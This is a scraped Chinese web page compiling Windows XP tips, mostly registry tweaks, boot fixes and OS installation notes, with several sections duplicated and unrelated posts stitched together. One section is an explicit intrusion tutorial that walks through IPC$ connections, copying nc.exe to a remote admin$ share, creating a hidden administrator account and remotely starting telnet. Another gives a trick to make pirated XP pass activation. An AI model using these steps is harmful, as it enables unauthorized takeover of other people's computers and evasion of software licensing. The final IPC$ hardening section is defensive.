〔开始〕→〔运行〕→键入〔Regedit〕→〔HKEY_LOCAL_MACHINE〕→〔System〕→〔CurrentControlSet〕→〔Control〕→〔Update〕
将 Dword〔UpdateMode〕的数值资料更改为〔0〕
重新开机便生效
7、关闭 XP 内设的刻盘功能
如果不打算使用此功能可将其关闭,可加快使用 Nero 刻录软件的速度
〔控制面板〕→〔系统管理工具〕→〔服务〕→在右变窗口选〔IMAPI CD-Burning COM Service〕→〔启动类型〕→选〔已停用〕
[转帖]WinXP:六条未公开的秘技 楼主
1.支持137 GB以上大硬盘
想要使用137 GB以上大硬盘,必须使用48位LBA模式。首先你的主板BIOS必须支持48Bit LBA,其次WinXP 家用版和专业版必须安装SP1补丁。然后打开注册表,在如下路径“HKEY_LOCAL_MACHINE System CurrentControlSet Services Atapi Parameter”找到“EnableBigLba”选项,将
其值由“0”改为“1”。如果该项不存在,可以自建“DWORD值”项目,同样设置.最后重新启动即可。
2.删除共享文档
如果你不需要共享文件,可以这样移除它:进入HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer My computer Namespace DelegateFolders,删除键值“”。
3.锁定桌面
想要锁定桌面不被别人肆意修改,可以使用很多工具例如TweakUI,不过其实在注册表里进行小小的改动即可实现:进入HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Policies Explorer,建立DWORD值“NoDesktop”,将其值修改为“1”即可。
4.停用“上次访问时间标记(Last Access Time Stamp)”
不想要这项功能,可以这样修改:进入HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Control File system,新建DWORD值“NtfsDisableLastAccessUpdate”,将其值修改为“1”即可。
5.设置“远程访问连接服务器(RAS)”
需要的话可以这样修改:进入HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows NT CurrentVersion Winlogon,新建字符串值“KeepRasConnections”,将其值修改为“1”即可。
6.使用明文密码(Lain Text Password)
访问UNIX或者LINUX服务器的时候,有时需要明文密码这在XP下很容易实现:找到“HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services lanmanworkstation parameter enableplaintextpassword”并将其值设置为“1”即可。
修改Windows XP设置技巧集之开关机篇
作者:福建163软件园 来源:http://www.fzsky.net 加入时间:2004-3-6
1、加快XP开机及关机速度
在〔开始〕→〔运行〕→键入〔Regedit〕
找到HKEY_CURRENT_USER\Control Panel\Desktop键,将右边窗口的WaitToKillAppTimeout改为1000
(原设定值:20000 )即关闭程序时仅等待1秒。
将键值HungAppTimeout的数值改为:200(原设定值:5000 ),表示程序出错时等待0.5秒。
找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
将键值WaitToKillServiceTimeout设为:1000或更小。(原设定值:20000 )
将键值〔HungAppTimeout〕的数值资料更改为〔200〕
2、加快预读能力改善开机速度
Windows XP预读设定可提高系统速度,加快开机速度。
在〔开始〕→〔运行〕→键入〔Regedit〕找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ MemoryManagement在PrefetchParameters右边窗口将〔EnablePrefetcher〕的数值资料如下更改:
PIII 800MHz以上的可尝试将数值资料更改为〔4〕或〔5〕
以下的建议保留数值资料为预设值即〔3〕
3、关机时自动关闭停止回应程序
让系统自动关闭停止回应的程序。
打开注册表HKEY_CURRENT_USER\Control Panel\Desktop键,将AutoEndTasks值设为1。(原设定值:0 )
4、在启动电脑时运行Defrag程序
在〔开始〕→〔运行〕→键入〔Regedit〕→〔HKEY_LOCAL_MACHINE〕
→〔SOFTWARE〕→〔Microsoft〕→〔Dfrg〕→〔BootOptimizeFunction〕
将键值〔Enable〕设定为〔Y〕等于开启而设定为〔N〕等于关闭
5、减少多重启动时等待时间
打开开始\控制面板\系统\进阶\启动及修复项目\按设定\系统启动\预设操作系统--两个项目都打勾-填入您想等待的时间ps :假如填入"0"系统将不会让您等待而直接载入您上次选定的操作系统
另一个方法
用Notepad打开在C:\目录下的boot.ini档案,将内容〔timeout〕的设定值由预设的30 (秒)改为要求等待的时间--存档
6、减少Windows XP开机载入区域网络时等待的时间
打开网络连接
用右键查看“本地连接”的“属性”
在一般下面,选“Internet协议(TCP/IP)”按内容
使用固定的IP地址,以后开机就不会停顿了
7、使用微软Bootvis.exe最佳化启动速度
先下载bootVis.exe档案,然后解压后运行〔bootvis.exe〕
在〔Trace〕选〔next boot + driver delays〕或其他选择项目后XP会重新启动并将记录启动资料产生成BIN的文件。
再在〔Bootvis.exe〕→〔file〕→〔open〕中打开这个文件→在〔Trace〕→选〔Optimize system〕
此优化需时颇长,请耐心等待
8、移除启动时载入不需要的程序
如开机时太多程序要运行时会影响开机的速度,先检查那些程序会在开机时运行
在〔开始〕→〔运行〕→键入〔msconfig〕→选〔启动〕
在启动内的程序是代表开机时要运行的程序,如须暂时停止运行某些程序便取消在〔□〕的〔X〕符号便可,如想恢复开机时运行此程序在〔□〕内加回〔X〕符号便可
如希望彻底移除者在〔msconfig〕→〔启动〕的左边栏〔位置〕上便显示引导程序运行的位置
其中:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
其中的〔HKLM〕代表登录档上的〔HKEY_LOCAL_MACHINE〕
在〔Run〕的右边窗口不需要的项目删除
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
其中的〔HKCU〕代表登录档上的〔HKEY_CURRENT_USER〕
在〔Run〕的右边窗口不需要的项目删除
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
则代表登录档的路径如下
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg
检查在〔startupreg〕下的路径,将不需要的项目删除
Common Startup
代表在〔开始〕→〔所有程序〕→〔启动〕的程序
只要在取消在〔msconfig〕→〔启动〕内〔□〕不选〔X〕符号便会代为将程序移离〔启动〕
9、加快开机的时间-停用不需要的服务
Windows在开机时会先载入很多不见得用得到的程序,以下的方法可以让您选择您需要载入的程序,但如您非系统高手不建议您动这个项目:
关掉一些伴随着Windows启动的程序,及常驻程序!!在"开始"--> "运行"中
输入msconfig进入"系统设定公用程序"在"启动"关掉不必要的程序,将方框中的勾勾取消,关掉不
必要的程序,不确定的程序不可以乱关,以免造成Windows错误!!
(先试试是否可以在软件本身取消常驻,不行再用此方法!!),完成后按"套用",重开机!!
10、制做XP开机磁盘
XP要做开机磁盘
把磁盘插入软驱-->按右键-->选格式化-->选建立一个MS-DOS开机磁盘
11、XP的自动关机问题
如果不能自动关机的话
控制面板-->电源-->显示-->屏幕保护程序-->电源管理-->APM打勾
这样应该就可以了
如果还不行,应该是BIOS的问题
12、关机有文本文档
在桌面空白位置按鼠标右键-> <新建> -> 选<文本文档>
键入rundll.exe user.exe,exitwindows
在<选择文本文档的名称>键入<关闭Window>或你想要的名称-> 按<完成>
13、重新启动有文本文档
在桌面空白位置按鼠标右键-> <新建> -> 选<文本文档>
在<命令行>键入rundll.exe user.exe,exitwindowsexec
在<选择文本文档的名称>键入<重新启动Restart>或你想要的名称-> 按<完成>
14、备份及还原窗口启动档
如需重装Windows XP,重装后必须重新启动,如按下列办法可解决此问题
备份
在\Windows\system32目录下将wpa.dbl及Wpa.bak用软盘备份
还原
重装Windows XP后,进入〔安全模式〕,在\Windows\system32目录下将wpa.dbl改名为wpadbl及wpa.bak改名为wpabak
然后将备份的wpa.dbl及Wpa.bak抄回此目录。
重新启动电脑按〔检查Windows XP是否登记〕办法更改登录注册
注:因Windows XP对硬件的更改次数有所限制,所以只适用于重装系统或小量更改硬件。
15、修复Windows XP的启动
由于在安装Windows XP后再安装其他版本的Windows而导致启动后不能进入Windows XP。
原因是当安装其他版本的Windows时,C盘的已被新安装的其他版本Windows取替,除了用其他的软件外,可尝试按以下办法进行修改,此更改不会提供任何支持及仅适用于FAT32格式,Windows 2000因系统较接近Windows XP,因此成功机会大,如属Windows 98或Windows ME未能成功修复者,可使用有关版本的启动磁盘启动电脑后在〔A:\>〕下键入〔Sys :〕后从新开机便可。
被Windows 98或ME占用了启动系统
先预备一张Win98的安装启动磁片。
进入Windows 98或ME用Notepad去编辑一个名为Read.scr内容如下。
-------------------------
L 100 2 0 1
N C:\BOOTSECT.DOS
R BX
0
R CX
200
W
Q
--------------------------
将档案存在Windows 98或ME的安装启动磁片及用此磁片启动电脑
如果C盘下有个名为BOOTSECT.DOS的档案便在A:>下先运行此命令
ATTRIB C:\BOOTSECT.DOS -S -H -R
然后在A:>下键入DEBUG
如刚才修改了BOOTSECT.DOS档案的属性再在A:>下先运行此命令:
ATTRIB C:\BOOTSECT.DOS+S+H+R
在BIOS设定用CD启动电脑,然后将Windows XP光盘放入及启动电脑。
让光盘自动运行至停止便会出现三个选择,按〔R〕选修复电脑便会询问要进入哪个系统,选中你要进入的系统按〔Enter〕键,然后输入Administrator密码(与安装时输入的Administrator密码相同)如果没有密码直接按Enter便可。
在X:\Windows> 下键入Fixboot及按〔Y〕确认。
X = Windows XP所安装驱动器的盘符。
完成后取出Win XP光盘及键入〔Exit〕会重新启动电脑。
在BIOS选回用硬盘启动电脑便可。
如未能正常显示多重启动选单者可修改C盘根目录的Boot.ini档案。
打印本页
|寻秦风云记 |设为首页 |加入收藏 |联系我们|
联系地址:湖北宜昌市港窑路52号 联系电话:0717-6076817 联系人:胡友龙
鄂ICP备05027425号
网站首页新竹主站宜昌风云市场营销生产管理长江机床
硬件咨讯大话三秦人才市场军事资讯便民服务留 言 板
在对的时间,遇见对的人,是一种幸福 在对的时间,遇见错的人,是一种悲伤 在错的时间,遇见对的人,是无奈`````
当前位置:网站首页 >> 硬件咨讯 >> 电脑经典应用技巧全集(魔鬼增强版) 双击自动滚屏
电脑经典应用技巧全集(魔鬼增强版)
发表日期:2005年11月26日 出处:转 作者:龙 已经有281位读者读过此文
电脑经典应用技巧全集(魔鬼增强版)
1.系统格式转换:convert c:/fs:ntfs回车,系统会提示在当前状态下无法完成,这时要重新启动。输入“Y”,然后Win XP会自动关机,在重启两次以后,再看C盘的属性,已经是NTFS了!整个过程还不到4分钟(转换过程需要的时间与硬盘大小和计算机配置有关)!
2.ip应用:(1).ping hostname
hostname为主机名,通过此命令可以获得名为hostname计算机的IP地址。
(2).ping -a x.x.x.x(已知的IP地址)
如果知道对方计算机的IP地址,通过此命令,可得知对方计算机的主机名。
(3).ping 127.0.0.1
127.0.0.1称为回调地址,通过此命令主要是测试计算机上协议是否安装正确。
2.hostname
获得计算机的主机名。注意:此命令只能在基于NT的计算机上运行,win9x上没有此命令。
3.ipconfig
最常用的就是ipconfig/all,通过此参数几乎可以看出计算机上关于TCP/IP网络的所有配置
5.netstat
用于显示所有的协议状态和当前基于TCP/IP的网络连接。通过netstat -a可以查看当前连接到你计算机的所有其它计算机。
TCP/IP诊断工具(二)
6.关于路由方面的诊断工具:
(1).route
我们知道,当有两个或两个以上的子网连接时,要使网络上的所有计算机都可以互相通信,就必须要使用有路由功能的设备了。对于维护路由器的朋友,此命令最常用的,通过此命令你可以查看、删除和添加当前的路由表。
(2).tracert
维护路由器时使用的工具,可以查看访问远程计算机时要经过那些路由器或网关,有兴趣的朋友可以通过tracert 。
7.arp
3.xp瘦身: 一、瘦身行动
1、在各种软硬件安装妥当之后,其实XP需要更件的时候就很少了。删除系统备份文件吧:开始→运行→sfc.exe /purgecache近3xxM。
2、删除驱动备份:%windows%\driver cache\i386目录下的driver.cab文件,通常这个文件是76M。
3、偶没有看help的习惯,所以保留着%windows%\help目录下的东西对我来说是一种伤害,呵呵。。。都干掉,近4xM。
4、一会在升级完成后你还会发现%windows%\多了许多类似$NtUninstallQ311889$这些目录,都干掉吧,1x-3xM。
修改注册表来减少预读取,减少进度条等待时间,效果是进度条跑一圈就进入登录画面了,开始→运行→regedit启动注册表编辑器,找HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters,有一个键EnablePrefetcher把它的数值改为“1”就可以了。另外不常更换硬件的朋友可以在系统属性中把总线设备上面的设备类型设置为none(无)。
二,nbtstat
该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。
-a 使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息如图3(下同)。
-A 这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP。
-n 列出本地机器的NETBIOS信息。
当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,这又增加了我们入侵的保险系数。
三,netstat
这是一个用来查看网络状态的命令,操作简便功能强大。
-a 查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息,如图4。
这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法:netstat -a IP。
-r 列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。用法:netstat -r IP。
四,tracert
跟踪路由信息,使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径,这对我们了解网络布局和结构很有帮助。
这里说明数据从本地机器传输到192.168.0.1的机器上,中间没有经过任何中转,说明这两台机器是在同一段局域网内。用法:tracert IP。
五,net
这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令,键入net /?回车。
在这里,我们重点掌握几个入侵常用的子命令。
net view
使用此命令查看远程主机的所以共享资源。命令格式为net view \\IP。
net use
把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,呵呵。命令格式为net use x: \\IP\sharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接(net use \\IP\IPC$ "password" /user:"name")。
建立了IPC$连接后,呵呵,就可以上传文件了:copy nc.exe \\192.168.0.7\admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。
net start
使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:net start servername,如图9,成功启动了telnet服务。
net stop
入侵后发现远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和net start同。
net user
查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的net user,可以查看所有用户,包括已经禁用的。下面分别讲解。
1,net user abcd 1234 /add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。
2,net user abcd /del,将用户名为abcd的用户删除。
3,net user abcd /active:no,将用户名为abcd的用户禁用。
4,net user abcd /active:yes,激活用户名为abcd的用户。
5,net user abcd,查看用户名为abcd的用户的情况。
net localgroup
查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。用法:net localgroup groupname username /add。
现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用net user abcd来查看他的状态,和图10进行比较就可以看出来。但这样太明显了,网管一看用户情况就能漏出破绽,所以这种方法只能对付菜鸟网管,但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员,这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。
net time
这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。用法:net time \\IP。
六,at
这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(知道net time的重要了吧?)。当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间(比如2分钟后)执行某个程序和命令。用法:at time command \\computer。
表示在6点55分时,让名称为a-01的计算机开启telnet服务(这里net start telnet即为开启telnet服务的命令)。
七,ftp
大家对这个命令应该比较熟悉了吧?网络上开放的ftp的主机很多,其中很大一部分是匿名的,也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机(一般都是开了21端口的机器),如果你还不会使用ftp的命令怎么办?下面就给出基本的ftp命令使用方法。
首先在命令行键入ftp回车,出现ftp的提示符,这时候可以键入“help”来查看帮助(任何DOS命令都可以使用此方法查看其帮助)。
大家可能看到了,这么多命令该怎么用?其实也用不到那么多,掌握几个基本的就够了。
首先是登陆过程,这就要用到open了,直接在ftp的提示符下输入“open 主机IP ftp端口”回车即可,一般端口默认都是21,可以不写。接着就是输入合法的用户名和密码进行登陆了,这里以匿名ftp为例介绍。
用户名和密码都是ftp,密码是不显示的。当提示**** logged in时,就说明登陆成功。这里因为是匿名登陆,所以用户显示为Anonymous。
1、加快XP开机及关机速度
在〔开始〕→〔运行〕→键入〔Regedit〕
找到HKEY_CURRENT_USER\Control Panel\Desktop键,将右边窗口的WaitToKillAppTimeout改为1000
(原设定值:20000 )即关闭程序时仅等待1秒。
将键值HungAppTimeout的数值改为:200(原设定值:5000 ),表示程序出错时等待0.5秒。
找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
将键值WaitToKillServiceTimeout设为:1000或更小。(原设定值:20000 )
将键值〔HungAppTimeout〕的数值资料更改为〔200〕
2、加快预读能力改善开机速度
Windows XP预读设定可提高系统速度,加快开机速度。
在〔开始〕→〔运行〕→键入〔Regedit〕找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ MemoryManagement在PrefetchParameters右边窗口将〔EnablePrefetcher〕的数值资料如下更改:
PIII 800MHz以上的可尝试将数值资料更改为〔4〕或〔5〕
以下的建议保留数值资料为预设值即〔3〕
3、关机时自动关闭停止回应程序
让系统自动关闭停止回应的程序。
打开注册表HKEY_CURRENT_USER\Control Panel\Desktop键,将AutoEndTasks值设为1。(原设定值:0 )
4、在启动电脑时运行Defrag程序
在〔开始〕→〔运行〕→键入〔Regedit〕→〔HKEY_LOCAL_MACHINE〕
→〔SOFTWARE〕→〔Microsoft〕→〔Dfrg〕→〔BootOptimizeFunction〕
将键值〔Enable〕设定为〔Y〕等于开启而设定为〔N〕等于关闭
5、减少多重启动时等待时间
打开开始\控制面板\系统\进阶\启动及修复项目\按设定\系统启动\预设操作系统--两个项目都打勾-填入您想等待的时间ps :假如填入"0"系统将不会让您等待而直接载入您上次选定的操作系统
另一个方法
用Notepad打开在C:\目录下的boot.ini档案,将内容〔timeout〕的设定值由预设的30 (秒)改为要求等待的时间--存档
6、减少Windows XP开机载入区域网络时等待的时间
打开网络连接
用右键查看“本地连接”的“属性”
在一般下面,选“Internet协议(TCP/IP)”按内容
使用固定的IP地址,以后开机就不会停顿了
7、使用微软Bootvis.exe最佳化启动速度
先下载bootVis.exe档案,然后解压后运行〔bootvis.exe〕
在〔Trace〕选〔next boot + driver delays〕或其他选择项目后XP会重新启动并将记录启动资料产生成BIN的文件。
再在〔Bootvis.exe〕→〔file〕→〔open〕中打开这个文件→在〔Trace〕→选〔Optimize system〕
此优化需时颇长,请耐心等待
8、移除启动时载入不需要的程序
如开机时太多程序要运行时会影响开机的速度,先检查那些程序会在开机时运行
在〔开始〕→〔运行〕→键入〔msconfig〕→选〔启动〕
在启动内的程序是代表开机时要运行的程序,如须暂时停止运行某些程序便取消在〔□〕的〔X〕符号便可,如想恢复开机时运行此程序在〔□〕内加回〔X〕符号便可
如希望彻底移除者在〔msconfig〕→〔启动〕的左边栏〔位置〕上便显示引导程序运行的位置
其中:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
其中的〔HKLM〕代表登录档上的〔HKEY_LOCAL_MACHINE〕
在〔Run〕的右边窗口不需要的项目删除
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
其中的〔HKCU〕代表登录档上的〔HKEY_CURRENT_USER〕
在〔Run〕的右边窗口不需要的项目删除
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
则代表登录档的路径如下
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg
检查在〔startupreg〕下的路径,将不需要的项目删除
Common Startup
代表在〔开始〕→〔所有程序〕→〔启动〕的程序
只要在取消在〔msconfig〕→〔启动〕内〔□〕不选〔X〕符号便会代为将程序移离〔启动〕
9、加快开机的时间-停用不需要的服务
Windows在开机时会先载入很多不见得用得到的程序,以下的方法可以让您选择您需要载入的程序,但如您非系统高手不建议您动这个项目:
关掉一些伴随着Windows启动的程序,及常驻程序!!在"开始"--> "运行"中
输入msconfig进入"系统设定公用程序"在"启动"关掉不必要的程序,将方框中的勾勾取消,关掉不
必要的程序,不确定的程序不可以乱关,以免造成Windows错误!!
(先试试是否可以在软件本身取消常驻,不行再用此方法!!),完成后按"套用",重开机!!
10、制做XP开机磁盘
XP要做开机磁盘
把磁盘插入软驱-->按右键-->选格式化-->选建立一个MS-DOS开机磁盘
11、XP的自动关机问题
如果不能自动关机的话
控制面板-->电源-->显示-->屏幕保护程序-->电源管理-->APM打勾
这样应该就可以了
如果还不行,应该是BIOS的问题
12、关机有文本文档
在桌面空白位置按鼠标右键-> <新建> -> 选<文本文档>
键入rundll.exe user.exe,exitwindows
在<选择文本文档的名称>键入<关闭Window>或你想要的名称-> 按<完成>
13、重新启动有文本文档
在桌面空白位置按鼠标右键-> <新建> -> 选<文本文档>
在<命令行>键入rundll.exe user.exe,exitwindowsexec
在<选择文本文档的名称>键入<重新启动Restart>或你想要的名称-> 按<完成>
14、备份及还原窗口启动档
如需重装Windows XP,重装后必须重新启动,如按下列办法可解决此问题
备份
在\Windows\system32目录下将wpa.dbl及Wpa.bak用软盘备份
还原
重装Windows XP后,进入〔安全模式〕,在\Windows\system32目录下将wpa.dbl改名为wpadbl及wpa.bak改名为wpabak
然后将备份的wpa.dbl及Wpa.bak抄回此目录。
重新启动电脑按〔检查Windows XP是否登记〕办法更改登录注册
注:因Windows XP对硬件的更改次数有所限制,所以只适用于重装系统或小量更改硬件。
15、修复Windows XP的启动
由于在安装Windows XP后再安装其他版本的Windows而导致启动后不能进入Windows XP。
原因是当安装其他版本的Windows时,C盘的已被新安装的其他版本Windows取替,除了用其他的软件外,可尝试按以下办法进行修改,此更改不会提供任何支持及仅适用于FAT32格式,Windows 2000因系统较接近Windows XP,因此成功机会大,如属Windows 98或Windows ME未能成功修复者,可使用有关版本的启动磁盘启动电脑后在〔A:\>〕下键入〔Sys :〕后从新开机便可。
被Windows 98或ME占用了启动系统
先预备一张Win98的安装启动磁片。
进入Windows 98或ME用Notepad去编辑一个名为Read.scr内容如下。
-------------------------
L 100 2 0 1
N C:\BOOTSECT.DOS
R BX
0
R CX
200
W
Q
--------------------------
将档案存在Windows 98或ME的安装启动磁片及用此磁片启动电脑
如果C盘下有个名为BOOTSECT.DOS的档案便在A:>下先运行此命令
ATTRIB C:\BOOTSECT.DOS -S -H -R
然后在A:>下键入DEBUG
如刚才修改了BOOTSECT.DOS档案的属性再在A:>下先运行此命令:
ATTRIB C:\BOOTSECT.DOS+S+H+R
在BIOS设定用CD启动电脑,然后将Windows XP光盘放入及启动电脑。
让光盘自动运行至停止便会出现三个选择,按〔R〕选修复电脑便会询问要进入哪个系统,选中你要进入的系统按〔Enter〕键,然后输入Administrator密码(与安装时输入的Administrator密码相同)如果没有密码直接按Enter便可。
在X:\Windows> 下键入Fixboot及按〔Y〕确认。
X = Windows XP所安装驱动器的盘符。
完成后取出Win XP光盘及键入〔Exit〕会重新启动电脑。
在BIOS选回用硬盘启动电脑便可。
如未能正常显示多重启动选单者可修改C盘根目录的Boot.ini档案。
XP一分钟变正版真正XP正版
1。必需安装XP原版,其它版我没试过,有兴趣你们试一试。
2。双击解压出来的文件XP文件
3。点击开始栏→选运行→输入regedit
4。找出Hkey_Local_Machine\Software\Microsoft\WindowsNT\CurrentVersion\WPAEvents
5。右击注册表中“WPAEvents”键→“权限”→选择列表中的“system”下方出现拒绝那一栏下面有两个小方格,请勾上。
6。确定,退出。
7。恭喜你,你XP已经是正版了,你不信?请点击激活。或运行oobe/msoobe /a试试。
8。你可以无限升级,升级SP1~SPN都行了,哈哈~!
巧妙安装各种Windows操作系统
对于新购置的电脑,在完成对硬盘的分区、格式化操作以后,就需要进行Windows系统的安装了。下面就来介绍一下Windows各种版本的安装方法。
安装Windows 98
新安装Windows 98系统,可以使用Windows 98系统启动盘启动计算机,然后将Windows 98安装光盘放入光驱,在DOS提示符状态下,进入光盘所在驱动器,然后进入Windows 98安装目录,运行Setup命令即可开始安装Windows 98。
在开始安装时,安装程序会自动调用Scandisk程序对电脑系统进行检测,检测通过后即进入Windows 98安装程序。当屏幕上出现“软件许可协议”对话框时,单击选中“接受协议”选项并单击“下一步”按钮,这时会要求你输入“产品密钥”,也就是我们常说的Windows 98安装序列号,完成后单击“下一步”按钮进行安装。
Windows 98安装程序进入“正在收集计算机的相关信息”界面,并对系统进行检查,以确保有足够的硬盘空间来安装Windows 98。完成后,即可按照提示,单击“下一步”按钮,选择“典型安装”方式,输入用户名和单位名称后,进入用户区域选择窗口,区域的选择主要是确定操作系统的系统时间以及日期,可以在列表中选择“中国”,然后单击“下一步”按钮。
在安装过程中,安装程序会询问用户是否创建启动盘,如果你还没有自己的Windows 98启动盘,那么建议选择“确定”按钮创建,否则单击“取消”按钮。在接下来的过程中,就不必我们为之操心了,安装程序会向硬盘拷贝数据,并完成最后的安装过程。文件复制结束后,会提示重新启动计算机,重启后,即可直接进入Windows 98安装程序,并在左侧显示安装剩余时间,耐心地等待过后,你就会发现,Windows 98已经被安装到系统中了。
小技巧:
往往我们在安装Windows 98时,通常会在命令行状态下输入Setup命令进行安装,然后运行Scandisk、扫描磁盘、制作启动盘、安装版本说明等过程,如果打算要Windows快些安装,可以在使用Setup命令的时候,使用一些参数,从而达到快速安装Windows 98的目的。Setup的参数主要包括以下几个参数:
/t:tmp:指定存放临时文件的目录
/id:跳过磁盘空间检查
/ie:不制作启动盘
/ih:不检查注册表
/im:跳过内存检查
/is:不执行磁盘扫描
/iv:安装时不显示版本说明
我们想快速安装Windows 98,就可以输入命令:setup /id/ie/ih/im/is/iv,这样安装程序就会直接进入文件复制过程,从而省下了大量的安装时间。
安装Windows Me
Windows Me的安装可分为升级安装和完全安装两种类型,Windows Me可以从Windows 95、Windows 98和Windows 98 SE上直接升级安装,但不能从Windows 3.x中升级。
Windows Me提供了三种安装方式,一是使用启动盘启动计算机,并进入安装目录执行Setup程序,需要注意的是,在执行安装程序之前,需要首先运行和加载磁盘高速缓存程序Smartdrv.exe。第二种方式是使用Windows Me光盘启动,自动执行安装程序。第三种方式是,在当前的操作系统中运行Windows Me的安装程序,比如在Windows 98系统中直接运行安装程序。
无论采用哪种安装方式,其操作过程基本都是一样的,与前面介绍的Windows 98安装程序类似。
如果你的电脑主频低于150MHz,那么会出现“在计算机上无法安装Windows,因为处理器低于150MHz,单击'确定’退出安装程序”的提示,这时不要着急,可以输入命令:setup/nm即可开始安装了。
另外,Windows Me的安装程序也存在一些参数(同Windows 98)。
安装Windows 2000和Windows XP
Windows 2000系统的安装可以在DOS和Windows 9x系统下直接安装,在光驱中放入Windows 2000安装盘后,会自动运行Windows 2000安装程序。选择全新安装后,会要求输入产品序列号,然后即可开始复制安装文件并重新启动计算机。
在重新启动后的界面中,按下回车键则可以开始安装Windows 2000,并进入安装目录选择窗口,同时选择需要安装的盘符。在接下来的窗口中,会要求选择文件系统的格式,为了可以高效发挥Windows 2000系统性能,建议选择“将磁盘分区转换为NTFS”,完成后按下回车键即可根据向导提示完成Windows 2000系统的安装了。
Windows XP安装方式包括三种,分别是升级安装、双系统共存安装和全新安装。它的安装方法与Windwos 2000系统安装方法类似,这里就不多做介绍了。
如果是在DOS方式下安装Windows 2000/XP系统,首先需要运行Smartdrv.exe命令,这样才能使安装程序可以快速地安装,否则等待的时间将是非常漫长的。
首先,我们用Windows 98启动盘启动电脑进入DOS模式,再执行Smartdrv.exe(如果软盘里没有该文件,可以从Windows 98的安装目录下的Command目录中获取)即可载入。然后执行Windows 2000/XP安装光盘中的i386目录下的Winnt.exe文件,记住:这里不是执行Setup.exe,而是Winnt.exe。以后的操作就比较简单了。
安装多个操作系统
在电脑中同时安装Windows 98和Windows 2000系统,可以首先安装Windows 98,然后在Windows 98系统中运行Windows 2000安装程序,这样就可以在计算机启动界面出现多重启动菜单,移动上下光标键并回车后即可选择进入相应的系统了。如果你打算让Windows Me系统与Windows 2000共存,最简单的方法是先安装好Windows Me,然后用Windows 98启动盘或者从光盘启动,安装Windows 2000,安装时选择“全新安装”方式。
如果你打算让Windows 98、Windows 2000和Windows XP共存,可以首先安装Windows 98,然后在Windows 98下安装Windows 2000系统,最后在Windows 2000下安装Windows XP系统,在完成安装后即可形成多重启动菜单了。
七 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
